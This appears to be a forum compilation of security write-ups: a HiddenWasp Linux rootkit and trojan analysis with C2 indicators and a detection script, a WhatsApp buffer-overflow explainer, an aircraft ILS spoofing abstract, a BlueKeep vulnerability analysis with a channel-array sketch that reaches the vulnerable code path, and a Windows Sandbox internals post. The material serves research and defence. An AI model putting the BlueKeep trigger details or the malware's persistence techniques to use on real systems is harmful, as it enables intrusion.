It seems that the implementation for dynamic import resolution slightly varies in comparison to the one used in Azazel rootkit. When we wrote the script to simulate the cipher that implements the string decoding function we observed the following algorithm: We recognized that a similar algorithm to the one above was used in the past by Mirai, implying that authors behind this rootkit may have ported and modified some code from Mirai. After the rootkit main object has been loaded into the address space of a given process and has decrypted its strings, it will export the functions that are intended to be hooked. We can see these exports to be the following: For every given export, the rootkit will hook and implement a specific operation accordingly, although they all have a similar layout. Before the original hooked function is called, it is checked whether the environment variable ‘I_AM_HIDDEN’ is set: We can see an example of how the rootkit hooks the function fopen in the following screenshot: We have observed that after checking whether the ‘I_AM_HIDDEN’ environment variable is set, it then runs a function to hide all the rootkits’ and trojans’ artifacts. In addition, specifically to the fopen function it will also check whether the file to open is ‘/proc/net/tcp’ and if it is it will attempt to hide the malware’s connection to the cnc by scanning every entry for the destination or source ports used to communicate with the cnc, in this case 61061. This is also the default port in Azazel rootkit. The rootkit primarily implements artifact hiding mechanisms as well as tcp connection hiding as previously mentioned. Overall functionality of the rootkit can be illustrated in the following diagram: 2.3 The Trojan: The trojan comes in the form of a statically linked ELF binary linked with stdlibc++. We noticed that the trojan has code connections with ChinaZ’s Elknot implant in regards to some common MD5 implementation in one of the statically linked libraries it was linked with: In addition, we also see a high rate of shared strings with other known ChinaZ malware, reinforcing the possibility that actors behind HiddenWasp may have integrated and modified some MD5 implementation from Elknot that could have been shared in Chinese hacking forums: When we analyze the main we noticed that the first action the trojan takes is to retrieve its configuration: The malware configuration is appended at the end of the file and has the following structure: The malware will try to load itself from the disk and parse this blob to then retrieve the static encrypted configuration. Once encryption configuration has been successfully retrieved the configuration will be decoded and then parsed as json. The cipher used to encode and decode the configuration is the following: This cipher seems to be an RC4 alike algorithm with an already computed PRGA generated key-stream. It is important to note that this same cipher is used later on in the network communication protocol between trojan clients and their CNCs. After the configuration is decoded the following json will be retrieved: Moreover, if the file is running as root, the malware will attempt to change the default location of the dynamic linker’s LD_PRELOAD path. This location is usually at /etc/ld.so.preload, however there is always a possibility to patch the dynamic linker binary to change this path: Patch_ld function will scan for any existent /lib paths. 
The scanned paths are the following:

The malware will attempt to find the dynamic linker binary within these paths. The dynamic linker filename is usually prefixed with ld-<version number>. Once the dynamic linker is located, the malware will find the offset where the /etc/ld.so.preload string is located within the binary and will overwrite it with the new target preload path, namely /sbin/.ifup-local. To achieve this patching, it will execute the following formatted string using the xxd hex editor utility, having previously encoded the path of the rootkit in hex:

Once it has changed the default LD_PRELOAD path in the dynamic linker, it will deploy a thread to enforce that the rootkit is successfully installed using the new LD_PRELOAD path. In addition, the trojan will communicate with the rootkit via the environment variable 'I_AM_HIDDEN' to serialize the trojan's session, so that the rootkit can apply evasion mechanisms to any other sessions. After seeing the rootkit's functionality, we can understand that the rootkit and trojan work together to help each other remain persistent in the system: the rootkit attempts to hide the trojan, and the trojan enforces that the rootkit remains operational. The following diagram illustrates this relationship:

Continuing with the execution flow of the trojan, a series of functions are executed to enforce evasion of some artifacts. These artifacts are the following:

By performing some OSINT on these artifact names, we found that they belong to a Chinese open-source rootkit for Linux known as Adore-ng, hosted on GitHub:

The fact that these artifacts are being searched for suggests that the Linux systems targeted by these implants may have already been compromised with some variant of this open-source rootkit as an additional artifact in this malware's infrastructure. Although those paths are searched for in order to hide their presence in the system, it is important to note that none of the analyzed artifacts related to this malware are installed in such paths. This finding may imply that the systems this malware aims to intrude are already-known compromised targets of the same group, or of a third party collaborating towards the same end goal of this particular campaign.

Moreover, the trojan communicates with its CNC using a simple network protocol over TCP. We can see that when a connection is established to the Master or Stand-By servers, there is a handshake mechanism involved in order to identify the client. With the help of this function we were able to understand the structure of the communication protocol employed. We can illustrate the structure of this communication protocol by looking at a pcap of the initial handshake between the server and client:

We noticed while analyzing this protocol that the Reserved and Method fields are always constant, those being 0 and 1 respectively. The cipher table offset represents the offset in the hardcoded key-stream that the encrypted payload was encoded with. The following is the fixed keystream this field makes reference to:

After decrypting the traffic and analyzing some of the network-related functions of the trojan, we noticed that the communication protocol is also implemented in JSON format.
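Based on that description, a plausible reading is that decoding a packet is just an XOR of the payload against the fixed, precomputed key-stream, starting at the offset carried in the packet header. The sketch below is an interpretation, not recovered code: the KEYSTREAM value and the example bytes are placeholders, since the real table is hard-coded inside the sample.

# Sketch of the decoding step implied above: XOR the payload against the
# hard-coded key-stream, starting at the offset given in the packet header.
# KEYSTREAM and the example bytes are placeholders, not the real values.
KEYSTREAM = bytes(range(256)) * 16   # stand-in for the fixed PRGA-style table

def decode_payload(payload: bytes, table_offset: int) -> bytes:
    return bytes(
        b ^ KEYSTREAM[(table_offset + i) % len(KEYSTREAM)]
        for i, b in enumerate(payload)
    )

# A decoded handshake should come out as a JSON object if the reading is right.
print(decode_payload(b"\x7a\x59\x4b", table_offset=0x10))

If this interpretation holds, running a captured handshake through such a routine is what yields the JSON structures referenced above.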
To show this, the following image is the decrypted handshake packets between the CNC and the trojan: After the handshake is completed, the trojan will proceed to handle CNC requests: Depending on the given requests the malware will perform different operations accordingly. An overview of the trojan’s functionalities performed by request handling are shown below: 2.3. Prevention and Response Prevention: Block Command-and-Control IP addresses detailed in the IOCs section. Response: We have provided a YARA rule intended to be run against in-memory artifacts in order to be able to detect these implants. In addition, in order to check if your system is infected, you can search for “ld.so” files — if any of the files do not contain the string ‘/etc/ld.so.preload’, your system may be compromised. This is because the trojan implant will attempt to patch instances of ld.so in order to enforce the LD_PRELOAD mechanism from arbitrary locations. 4. Summary We analyzed every component of HiddenWasp explaining how the rootkit and trojan implants work in parallel with each other in order to enforce persistence in the system. We have also covered how the different components of HiddenWasp have adapted pieces of code from various open-source projects. Nevertheless, these implants managed to remain undetected. Linux malware may introduce new challenges for the security community that we have not yet seen in other platforms. The fact that this malware manages to stay under the radar should be a wake up call for the security industry to allocate greater efforts or resources to detect these threats. Linux malware will continue to become more complex over time and currently even common threats do not have high detection rates, while more sophisticated threats have even lower visibility. IOCs 103.206.123[.]13 103.206.122[.]245 http://103.206.123[.]13:8080/system.tar.gz http://103.206.123[.]13:8080/configUpdate.tar.gz http://103.206.123[.]13:8080/configUpdate-32.tar.gz e9e2e84ed423bfc8e82eb434cede5c9568ab44e7af410a85e5d5eb24b1e622e3 f321685342fa373c33eb9479176a086a1c56c90a1826a0aef3450809ffc01e5d d66bbbccd19587e67632585d0ac944e34e4d5fa2b9f3bb3f900f517c7bbf518b 0fe1248ecab199bee383cef69f2de77d33b269ad1664127b366a4e745b1199c8 2ea291aeb0905c31716fe5e39ff111724a3c461e3029830d2bfa77c1b3656fc0 d596acc70426a16760a2b2cc78ca2cc65c5a23bb79316627c0b2e16489bf86c0 609bbf4ccc2cb0fcbe0d5891eea7d97a05a0b29431c468bf3badd83fc4414578 8e3b92e49447a67ed32b3afadbc24c51975ff22acbd0cf8090b078c0a4a7b53d f38ab11c28e944536e00ca14954df5f4d08c1222811fef49baded5009bbbc9a2 8914fd1cfade5059e626be90f18972ec963bbed75101c7fbf4a88a6da2bc671b By Ignacio Sanmillan Nacho is a security researcher specializing in reverse engineering and malware analysis. Nacho plays a key role in Intezer's malware hunting and investigation operations, analyzing and documenting new undetected threats. Some of his latest research involves detecting new Linux malware and finding links between different threat actors. Nacho is an adept ELF researcher, having written numerous papers and conducting projects implementing state-of-the-art obfuscation and anti-analysis techniques in the ELF file format. Sursa: https://www.intezer.com/blog-hiddenwasp-malware-targeting-linux-systems/
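The ld.so check suggested in the response section above is easy to automate. The sketch below walks a few common library directories, looks for dynamic-linker binaries (ld-*.so*), and flags any that no longer contain the '/etc/ld.so.preload' string; the directory list is an assumption that may need adjusting per distribution, since the exact paths scanned by the implant are not reproduced here.

#!/usr/bin/env python3
# Flag dynamic linkers that no longer reference '/etc/ld.so.preload',
# which HiddenWasp patches to point at /sbin/.ifup-local instead.
import glob

SEARCH_GLOBS = [          # common locations; adjust for your distribution
    "/lib/ld-*.so*",
    "/lib64/ld-*.so*",
    "/lib/x86_64-linux-gnu/ld-*.so*",
    "/lib/i386-linux-gnu/ld-*.so*",
]

def main() -> None:
    suspicious = []
    for pattern in SEARCH_GLOBS:
        for path in glob.glob(pattern):
            try:
                with open(path, "rb") as f:
                    data = f.read()
            except OSError:
                continue
            if b"/etc/ld.so.preload" not in data:
                suspicious.append(path)
    if suspicious:
        print("[!] possibly patched dynamic linkers:")
        for path in suspicious:
            print("    " + path)
    else:
        print("[+] all dynamic linkers found still reference /etc/ld.so.preload")

if __name__ == "__main__":
    main()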
  22. How WhatsApp was Hacked by Exploiting a Buffer Overflow Security Flaw Try it Yourself WhatsApp has been in the news lately following the discovery of a buffer overflow flaw. Read on to experience just how it happened and try out hacking one yourself. 10 MINUTE READ WhatsApp entered the news early last week following the discovery of an alarming targeted security attack, according to the Financial Times. WhatsApp, famously acquired by Facebook for $19 billion in 2014, is the world’s most-popular messaging app with 1.5 billion monthly users from 180 countries and has always prided itself on being secure. Below, we’ll explain what went wrong technically, and teach you how you could hack a similar memory corruption vulnerability. Try out the hack First, what’s up with WhatsApp security? WhatsApp has been a popular communication platform for human rights activists and other groups seeking privacy from government surveillance due to the company’s early stance on providing strong end-to-end encryption for all of its users. This means, in theory, that only the WhatsApp users involved in a chat are able to decrypt those communications, even if someone were to hack into the systems running at WhatsApp Inc. (a property called forward secrecy). An independent audit by academics in the UK and Canada found no major design flaws in the underlying Signal Messaging Protocol deployed by WhatsApp. We suspect that the company’s security eminence and focus on baking in privacy comes from the strong security mindset of WhatsApp founder Jan Koum who grew up as a hacker in the w00w00 hacker clan in the 1990s. But WhatsApp was then used for … surveillance? WhatsApp’s reputation as a secure messaging app and its popularity amongst activists made the report of a 3rd party company stealthily offering turn-key targeted surveillance against WhatsApp’s Android and iPhone users all the more disconcerting. The company in question, the notorious and secretive Israeli company the NSO Group, is likely an offshoot of Unit 8200 that was allegedly responsible for the Stuxnet cyberattack against the Iranian nuclear enrichment program, and has recently been under fire for licensing its advanced Pegasus spyware to foreign governments, and allegedly aiding the Saudi regime spy on the journalist Jamal Khashoggi. The severe accusations prompted the NSO co-founder and CEO to give a rare interview with 60 Minutes about the company and its policies. Facebook is now considering legal options against NSO. The initial fear was that the end-to-end encryption of WhatsApp had been broken, but this turned out not to be the case. So what went wrong? Instead of attacking the encryption protocols used by WhatsApp, the NSO Group attacked the mobile application code itself. Following the adage that the chain is never stronger than its weakest link, reasonable attackers avoid spending resources on decrypting communications of their target if they could instead simply hack the device and grab the private encryption keys themselves. In fact, hacking an endpoint device reveals all the chats and dialogs of the target and provides a perfect vantage point for surveillance. This strategy is well known: already in 2014, the exiled NSA whistleblower Edward Snowden hinted at the tactic of governments hacking endpoints rather than focusing on the encrypted messages. According to a brief security advisory issued by Facebook, the attack against WhatsApp was a previously unknown (0-day) vulnerability in the mobile app. 
A malicious user could initiate a phone call against any WhatsApp user logged into the system. A few days after the Financial Times broke the news of the WhatsApp security breach, researchers at CheckPoint reverse engineered the security patch issued by Facebook to narrow down what code might have contained the vulnerability. Their best guess is that the WhatsApp application code contained what’s called a buffer overflow memory corruption vulnerability due to insufficient checking of length of data. I’ve heard the term buffer overflow. But I don’t really know what it is. To explain buffer overflows, it helps to think about how the C and C++ programming languages approach memory. Unlike most modern programming languages, where the memory for objects is allocated and released as needed, a C/C++ program sees the world as a continuum of 1-byte memory cells. Let’s imagine this memory as a vast row of labeled boxes, sequentially from 0. (Photo by Samuel Zeller on Unsplash) Suppose some program, through dynamic memory allocation, opts to store the name of the current user (“mom”) as the three characters “m”, “o” and “m” in boxes 17000 to 17002. But other data might live in boxes 17003 and onwards. A crucial design decision in C and C++ is that it is entirely the responsibility of the programmer that data winds up in the correct memory cells -- the right set of boxes. Thus if the programmer accidentally puts some part of “mom” inside box 17003, neither the compiler nor the runtime will complain. Perhaps they typed in “mommy”. The program will happily place the extra two characters into boxes 17003 and 17004 without any advance warning, overwriting whatever other potentially important data lives there. But how does this relate to security? Of course, if whatever memory corruption bug the programmer introduced always puts the data erroneously into the extra two boxes 17003 and 17004 with the control flow of the program always impacted, then it’s highly likely that the programmer has already discovered their mistake when testing the program -- the program is bound to fail each time, afterall. But when problems arise only in response to certain unusual inputs, the issues are far more likely to have failed the sniff test and persisted in the code base. Where such overwriting behavior gets interesting for hackers is when the data in box 17003 is of material importance for the program to figure out how the program should continue to run. The formal word is that the overwritten data might affect the control flow of the application. For example, what if boxes 17003 and 17004 contain information about what function in the program should be called when the user logs in? (In C, this might be represented by a function pointer; in C++, this might be a class member function). Suddenly, the path of the program execution can be influenced by the user. It’s like you could tell somebody else’s program, “Hey, you should do X, Y and Z”, and it will abide. If you were the hacker, what would you do with that opportunity? Think about it for a second. What would you do? I would … tell the program to .. take over the computer? You would likely choose to steer the program into a place that would let you get further access, so that you could do some more interactive hacking. Perhaps you could make it somehow run code that would provide remote access to the computer (or phone) on which the program is running. 
This choice of a payload is the craft of writing a shellcode (code that boots up a remote UNIX shell interface for the hacker, get it?) Two key ideas make such attacks possible. The first is that in the view of a computer, there is no fundamental difference between data and code. Both are represented as a series of bits. Thus it may be possible to inject data into the program, say instead of the string “mommy”, that would then be viewed and executed as code! This is indeed how buffer overflows were first exploited by hackers, first hypothetically in 1972 and then practically by MIT’s Robert T. Morris’s Morris worm that swept the internet in 1988 and Aleph One’s 1996 Smashing the Stack for Fun and Profit article in the underground hacker magazine Phrack. The second idea, which was crystalized after a series of defenses made it difficult to execute data introduced by an attacker as code, is to direct the program to execute a sequence of instructions that are already contained within the program in a chosen order, without directly introducing any new instructions. It can be imagined as a ransom note composed of letter cutouts from newspapers without the author needing to provide any handwriting. (Image generated with Ransomizer.com) Such methods of code-reuse attacks, the most prominent being return-oriented programming (ROP), are the state-of-the-art in binary exploitation and the reason why buffer overflows are still a recurring security problem. Among the reported vulnerabilities in the CVE repository, buffer overflows and related memory corruption vulnerabilities still accounted for 14% of the nearly 19,000 vulnerabilities reported in 2018. Ahh… but what happened with WhatsApp? What the researchers at CheckPoint found by dissecting the WhatsApp security patch were the following highlighted changes to the machine code in the Android app. The code is in the real-time video transmission part of the program, specifically code that pertains to the exchange of information of how well the video of a video call is being received (the RTP Control Protocol (RTCP) feedback channel for the Real-time Transmission Protocol). (Image credit: CheckPoint Research) The odd choices for variable names and structure are artifacts from the reverse engineering process: the source code for the protocol is proprietary. The C++ code might be a heavily modified version of the open-source PJSIP routine that tries to assemble a response to signal a picture loss (PLI) (code is illustrative): int length_argument = /* from incoming RTCP packet */ qmemcpy( &outgoing_rtcp_payload[ offset ], incoming_rtcp_packet, length_argument ); /* Continue building RTCP PLI packet and send */ But if the remaining size of the payload buffer (after offset) is less than the length_argument, a number supplied by the hacker, information from the incoming packet would be shamelessly copied by memcpy over whatever data surrounds outgoing_rtcp_payload ! Just like the situation with the buffer overflow before, these overwritten data could include data that could later direct the control flow of the program, like an overwritten function pointer. In summary (coupled with speculation), a hacker would initiate a video call against an unsuspecting WhatsApp user. 
As the video channel is being set up, the hacker manipulates the video frames being sent to the victim to force the RTCP code in their app to signal a picture loss (PLI), but only after specially crafting the sent frame so that the lengths in the incoming packet will cause the net size of the RTCP response payload to be exceeded. The control flow of the program is then directed towards executing malicious code to seize control of the app, install an implant on the phone, and then allow the app to continue running. Try it yourself? Buffer overflows are technical flaws, and build on an understanding of how computers execute code. Given how prevalent they are, and important -- as illustrated by the WhatsApp attack, we believe we should all better understand how such bugs are exploited to help us avoid them in the future. In response, we have created a free online lab that puts you in the shoes of the hacker and illustrates how memory and buffer overflows work when you boil them down to their essence. Do you like this kind of thing? Go read about how Facebook got hacked last year and try out hacking it yourself. Learn more about our security training platform for developers at adversary.io Sursa: https://blog.adversary.io/whatsapp-hack/
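To make the lesson of the patch concrete, here is a small, language-neutral illustration (it is not WhatsApp's actual code, and the buffer size and packet bytes are made up): before copying packet-supplied data, the attacker-controlled length has to be compared against the space actually left in the destination buffer.

# Illustration of the missing bounds check, not the real RTCP handling code.
# An attacker-controlled length must never exceed the space remaining in the
# destination buffer after the current write offset.
PAYLOAD_BUFFER_SIZE = 1500   # hypothetical fixed-size outgoing RTCP buffer

def copy_into_payload(payload: bytearray, offset: int, incoming: bytes, length: int) -> int:
    remaining = PAYLOAD_BUFFER_SIZE - offset
    if length > remaining or length > len(incoming):
        raise ValueError("declared length exceeds available space; dropping packet")
    payload[offset:offset + length] = incoming[:length]
    return offset + length

buf = bytearray(PAYLOAD_BUFFER_SIZE)
new_offset = copy_into_payload(buf, 0, b"\x81\xce" + b"A" * 62, 64)
print(f"wrote up to offset {new_offset}")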
  23. Wireless Attacks on Aircraft Instrument Landing Systems Harshad Sathaye, Domien Schepers, Aanjhan Ranganathan, and Guevara Noubir Khoury College of Computer Sciences Northeastern University, Boston, MA, USA Abstract Modern aircraft heavily rely on several wireless technologies for communications, control, and navigation. Researchers demonstrated vulnerabilities in many aviation systems. However, the resilience of the aircraft landing systems to adversarial wireless attacks have not yet been studied in the open literature, despite their criticality and the increasing availability of low-cost software-defined radio (SDR) platforms. In this paper, we investigate the vulnerability of aircraft instrument landing systems (ILS) to wireless attacks. We show the feasibility of spoofing ILS radio signals using commerciallyavailable SDR, causing last-minute go around decisions, and even missing the landing zone in low-visibility scenarios. We demonstrate on aviation-grade ILS receivers that it is possible to fully and in fine-grain control the course deviation indicator as displayed by the ILS receiver, in realtime. We analyze the potential of both an overshadowing attack and a lower-power single-tone attack. In order to evaluate the complete attack, we develop a tightly-controlled closed-loop ILS spoofer that adjusts the adversary’s transmitted signals as a function of the aircraft GPS location, maintaining power and deviation consistent with the adversary’s target position, causing an undetected off-runway landing. We systematically evaluate the performance of the attack against an FAA certified flight-simulator (X-Plane)’s AI-based autoland feature, and demonstrate systematic success rate with offset touchdowns of 18 meters to over 50 meters. Download: https://aanjhan.com/assets/ils_usenix2019.pdf
  24. Analysis of CVE-2019-0708 (BlueKeep)

By: MalwareTech, May 31, 2019

I held back this write-up until a proof of concept (PoC) was publicly available, so as not to cause any harm. Now that there are multiple denial-of-service PoCs on GitHub, I'm posting my analysis.

Binary Diffing

As always, I started with a BinDiff of the binaries modified by the patch (in this case there is only one: TermDD.sys). Below we can see the results.

(A BinDiff of TermDD.sys pre and post patch.)

Most of the changes turned out to be pretty mundane, except for "_IcaBindVirtualChannels" and "_IcaRebindVirtualChannels". Both functions contained the same change, so I focused on the former, since a bind would likely occur before a rebind.

(Original IcaBindVirtualChannels is on the left, the patched version is on the right.)

New logic has been added, changing how _IcaBindChannel is called. If the compared string is equal to "MS_T120", then the third parameter of _IcaBindChannel is set to 31. Based on the fact that the change only takes place if v4+88 is "MS_T120", we can assume that this condition must be true to trigger the bug. So, my first question is: what is "v4+88"?

Looking at the logic inside IcaFindChannelByName, I quickly found my answer.

(Inside of IcaFindChannelByName.)

Using advanced knowledge of the English language, we can decipher that IcaFindChannelByName finds a channel by its name. The function seems to iterate the channel table, looking for a specific channel. On line 17 there is a string comparison between a3 and v6+88, which returns v6 if both strings are equal. Therefore, we can assume a3 is the channel name to find, v6 is the channel structure, and v6+88 is the channel name within the channel structure. Using all of the above, I came to the conclusion that "MS_T120" is the name of a channel.

Next, I needed to figure out how to call this function and how to set the channel name to MS_T120. I set a breakpoint on IcaBindVirtualChannels, right where IcaFindChannelByName is called. Afterwards, I connected to RDP with a legitimate RDP client. Each time the breakpoint triggered, I inspected the channel name and call stack.

(The call stack and channel name upon the first call to IcaBindVirtualChannels.)

The very first call to IcaBindVirtualChannels is for the channel I want, MS_T120. The subsequent channel names are "CTXTW ", "rdpdr", "rdpsnd", and "drdynvc". Unfortunately, the vulnerable code path is only reached if FindChannelByName succeeds (i.e. the channel already exists). In this case, the function fails and leads to the MS_T120 channel being created. To trigger the bug, I'd need to call IcaBindVirtualChannels a second time with MS_T120 as the channel name.

So my task now was to figure out how to call IcaBindVirtualChannels. IcaStackConnectionAccept appears in the call stack, so the channel is likely created upon connect. I just needed to find a way to open arbitrary channels post-connect… Maybe sniffing a legitimate RDP connection would provide some insight.

(A capture of the RDP connection sequence.)
(The channel array, as seen by the Wireshark RDP parser.)

The second packet sent contains four of the six channel names I saw passed to IcaBindVirtualChannels (missing MS_T120 and CTXTW). The channels are opened in the order they appear in the packet, so I think this is just what I need. Seeing as MS_T120 and CTXTW are not specified anywhere but are opened prior to the rest of the channels, I guess they must be opened automatically. Now, I wonder what happens if I implement the protocol, then add MS_T120 to the array of channels.
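Conceptually, that test amounts to appending one more entry to the static virtual channel list the client sends during the connection sequence. Below is a rough C sketch of such a channel definition array, using the 8-byte-name-plus-4-byte-options layout of RDP static virtual channel entries; the option flag values are placeholders for illustration, not taken from a real client:

#include <stdint.h>

/* Static virtual channel entry as carried in the RDP client network data:
   an 8-byte, null-padded ANSI name followed by 4 bytes of option flags. */
struct channel_def {
    char     name[8];
    uint32_t options;
};

/* Three channels a stock client normally requests, plus MS_T120, which the
   server otherwise only creates and binds internally. */
static const struct channel_def requested_channels[] = {
    { "rdpdr",   0x80800000u },
    { "rdpsnd",  0xc0000000u },
    { "drdynvc", 0xc0800000u },
    { "MS_T120", 0x80800000u },  /* the extra entry that reaches the vulnerable bind */
};

With MS_T120 present in the client's list, IcaBindVirtualChannels is called a second time for a channel that already exists, which is exactly the condition needed to reach the vulnerable code path.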
After moving my breakpoint to some code only hit if FindChannelByName succeeds, I ran my test.

(Breakpoint is hit after adding MS_T120 to the channel array.)

Awesome! Now that the vulnerable code path is hit, I just need to figure out what can be done… To learn more about what the channel does, I decided to find what created it. I set a breakpoint on IcaCreateChannel, then started a new RDP connection.

(The call stack when the IcaCreateChannel breakpoint is hit.)

Following the call stack downwards, we can see the transition from user to kernel mode at ntdll!NtCreateFile. Ntdll just provides a thunk for the kernel, so that's not of interest. Below it is ICAAPI, the user mode counterpart of TermDD.sys. The call starts out in ICAAPI at IcaChannelOpen, so this is probably the user mode equivalent of IcaCreateChannel. Because IcaChannelOpen is a generic function used for opening all channels, we'll go down another level to rdpwsx!MCSCreateDomain.

(The code for rdpwsx!MCSCreateDomain.)

This function is really promising for a couple of reasons: firstly, it calls IcaChannelOpen with the hard-coded name "MS_T120"; secondly, it creates an I/O completion port with the returned channel handle (completion ports are used for asynchronous I/O). The variable named "CompletionPort" is the completion port handle. By looking at xrefs to the handle, we can probably find the function which handles I/O to the port.

(All references to "CompletionPort".)

Well, MCSInitialize is probably a good place to start. Initialization code is always a good place to start.

(The code contained within MCSInitialize.)

OK, so a thread is created for the completion port, and the entry point is IoThreadFunc. Let's look there.

(The completion port message handler.)

GetQueuedCompletionStatus is used to retrieve data sent to a completion port (i.e. the channel). If data is successfully received, it's passed to MCSPortData. To confirm my understanding, I wrote a basic RDP client with the capability of sending data on RDP channels. I opened the MS_T120 channel, using the method previously explained. Once opened, I set a breakpoint on MCSPortData; then I sent the string "MalwareTech" to the channel.

(Breakpoint hit on MCSPortData once data is sent to the channel.)

So that confirms it: I can read/write to the MS_T120 channel. Now, let's look at what MCSPortData does with the channel data…

(MCSPortData buffer handling code.)

ReadFile tells us the data buffer starts at channel_ptr+116. Near the top of the function is a check performed on channel_ptr+120 (offset 4 into the data buffer). If the dword is set to 2, the function calls HandleDisconnectProviderIndication and MCSCloseChannel. Well, that's interesting. The code looks like some kind of handler for channel connect/disconnect events. After looking into what would normally trigger this function, I realized MS_T120 is an internal channel and not normally exposed externally. I don't think we're supposed to be here…

Being a little curious, I sent the data required to trigger the call to MCSChannelClose. Surely prematurely closing an internal channel couldn't lead to any issues, could it? Oh, no. We crashed the kernel! Whoops! Let's take a look at the bugcheck to get a better idea of what happened. It seems that when my client disconnected, the system tried to close the MS_T120 channel, which I'd already closed (leading to a double free). Due to some mitigations added in Windows Vista, double-free vulnerabilities are often difficult to exploit. However, there is something better.
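Before moving on to what that "something better" is, the MCSPortData handling described above can be restated as a small C sketch. The offsets come from the decompiler output quoted above, while the surrounding function shape and the generic data handler are invented for illustration:

#include <stdint.h>
#include <string.h>

extern void HandleDisconnectProviderIndication(uint8_t *channel_ptr);
extern void MCSCloseChannel(uint8_t *channel_ptr);
extern void handle_channel_data(uint8_t *channel_ptr, uint32_t length);  /* invented name */

/* Sketch of the MCSPortData dispatch: the data buffer begins at
   channel_ptr+116, and the dword at offset 4 of that buffer
   (channel_ptr+120) selects the action. */
void mcs_port_data_sketch(uint8_t *channel_ptr, uint32_t length)
{
    uint8_t *buffer = channel_ptr + 116;
    uint32_t action;

    memcpy(&action, buffer + 4, sizeof(action));

    if (action == 2) {
        /* A client that can write to MS_T120 can reach this path and close
           an internal channel the system still expects to clean up later. */
        HandleDisconnectProviderIndication(channel_ptr);
        MCSCloseChannel(channel_ptr);
        return;
    }

    handle_channel_data(channel_ptr, length);
}

Sending a channel PDU whose dword at offset 4 equals 2 is the "data required to trigger the call" mentioned above.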
(Internals of the channel cleanup code run when the connection is broken.)

Internally, the system creates the MS_T120 channel and binds it with ID 31. However, when it is bound via the vulnerable IcaBindVirtualChannels code path, it is bound with another ID.

(The difference in code pre and post patch.)

Essentially, the MS_T120 channel gets bound twice (once internally, then once by us). Because the channel is bound under two different IDs, we get two separate references to it. When one reference is used to close the channel, that reference is deleted, as is the channel; however, the other reference remains (a use-after-free). With the remaining reference, it is now possible to write to kernel memory that no longer belongs to us.

Sursa: https://www.malwaretech.com/2019/05/analysis-of-cve-2019-0708-bluekeep.html
  25. Windows Sandbox

Hari Pulapaka, Microsoft, 12-18-2018 04:18 PM

Windows Sandbox is a new lightweight desktop environment tailored for safely running applications in isolation.

How many times have you downloaded an executable file, but were afraid to run it? Have you ever been in a situation which required a clean installation of Windows, but didn't want to set up a virtual machine? At Microsoft we regularly encounter these situations, so we developed Windows Sandbox: an isolated, temporary desktop environment where you can run untrusted software without the fear of lasting impact to your PC. Any software installed in Windows Sandbox stays only in the sandbox and cannot affect your host. Once Windows Sandbox is closed, all the software with all its files and state is permanently deleted.

Windows Sandbox has the following properties:

Part of Windows – everything required for this feature ships with Windows 10 Pro and Enterprise. No need to download a VHD!
Pristine – every time Windows Sandbox runs, it's as clean as a brand-new installation of Windows.
Disposable – nothing persists on the device; everything is discarded after you close the application.
Secure – uses hardware-based virtualization for kernel isolation, relying on Microsoft's hypervisor to run a separate kernel that isolates Windows Sandbox from the host.
Efficient – uses an integrated kernel scheduler, smart memory management, and a virtual GPU.

Prerequisites for using the feature:

Windows 10 Pro or Enterprise, Insider build 18305 or later
AMD64 architecture
Virtualization capabilities enabled in BIOS
At least 4GB of RAM (8GB recommended)
At least 1GB of free disk space (SSD recommended)
At least 2 CPU cores (4 cores with hyperthreading recommended)

Quick start:

Install Windows 10 Pro or Enterprise, Insider build 18305 or newer.
Enable virtualization: if you are using a physical machine, ensure virtualization capabilities are enabled in the BIOS; if you are using a virtual machine, enable nested virtualization with this PowerShell cmdlet: Set-VMProcessor -VMName <VMName> -ExposeVirtualizationExtensions $true
Open Windows Features, and then select Windows Sandbox. Select OK to install Windows Sandbox. You might be asked to restart the computer.
Using the Start menu, find Windows Sandbox, run it and allow the elevation.
Copy an executable file from the host.
Paste the executable file into the window of Windows Sandbox (on the Windows desktop).
Run the executable in Windows Sandbox; if it is an installer, go ahead and install it.
Run the application and use it as you normally do.
When you're done experimenting, simply close the Windows Sandbox application. All sandbox content will be discarded and permanently deleted.
Confirm that the host does not have any of the modifications that you made in Windows Sandbox.

Windows Sandbox respects the host diagnostic data settings. All other privacy settings are set to their default values.

Windows Sandbox internals

Since this is the Windows Kernel Internals blog, let's go under the hood. Windows Sandbox builds on the technologies used within Windows Containers. Windows containers were designed to run in the cloud. We took that technology, added integration with Windows 10, and built features that make it more suitable to run on devices and laptops without requiring the full power of Windows Server.
Some of the key enhancements we have made include:

Dynamically generated image

At its core Windows Sandbox is a lightweight virtual machine, so it needs an operating system image to boot from. One of the key enhancements we have made for Windows Sandbox is the ability to use a copy of the Windows 10 installed on your computer, instead of downloading a new VHD image as you would have to do with an ordinary virtual machine.

We want to always present a clean environment, but the challenge is that some operating system files can change. Our solution is to construct what we refer to as a "dynamic base image": an operating system image that has clean copies of the files that can change, but links to the files that cannot change in the Windows image that already exists on the host. The majority of the files are links (immutable files), which is why a full operating system image comes in at such a small size (~100MB). We call this instance the "base image" for Windows Sandbox, using Windows Container parlance. When Windows Sandbox is not installed, we keep the dynamic base image in a compressed package which is only 25MB. Once installed, the dynamic base package occupies about 100MB of disk space.

Smart memory management

Memory management is another area where we have integrated with the Windows kernel. Microsoft's hypervisor allows a single physical machine to be carved up into multiple virtual machines which share the same physical hardware. While that approach works well for traditional server workloads, it isn't as well suited to devices with more limited resources. We designed Windows Sandbox in such a way that the host can reclaim memory from the sandbox if needed.

Additionally, since Windows Sandbox is basically running the same operating system image as the host, we also allow Windows Sandbox to use the same physical memory pages as the host for operating system binaries, via a technology we refer to as "direct map". In other words, the same executable pages of ntdll are mapped into the sandbox as on the host. We take care to ensure this is done in a secure manner and no secrets are shared.

Integrated kernel scheduler

With ordinary virtual machines, Microsoft's hypervisor controls the scheduling of the virtual processors running in the VMs. However, for Windows Sandbox we use a new technology called the "integrated scheduler", which allows the host to decide when the sandbox runs. For Windows Sandbox we employ a unique scheduling policy that allows the virtual processors of the sandbox to be scheduled in the same way as threads would be scheduled for a process. High-priority tasks on the host can preempt less important work in the sandbox. The benefit of the integrated scheduler is that the host manages Windows Sandbox as a process rather than a virtual machine, which results in a much more responsive host, similar to Linux KVM. The whole goal here is to treat the sandbox like an app, but with the security guarantees of a virtual machine.

Snapshot and clone

As stated above, Windows Sandbox uses Microsoft's hypervisor. We're essentially running another copy of Windows which needs to be booted, and this can take some time. So rather than paying the full cost of booting the sandbox operating system every time we start Windows Sandbox, we use two other technologies: "snapshot" and "clone". Snapshot allows us to boot the sandbox environment once and preserve the memory, CPU, and device state to disk.
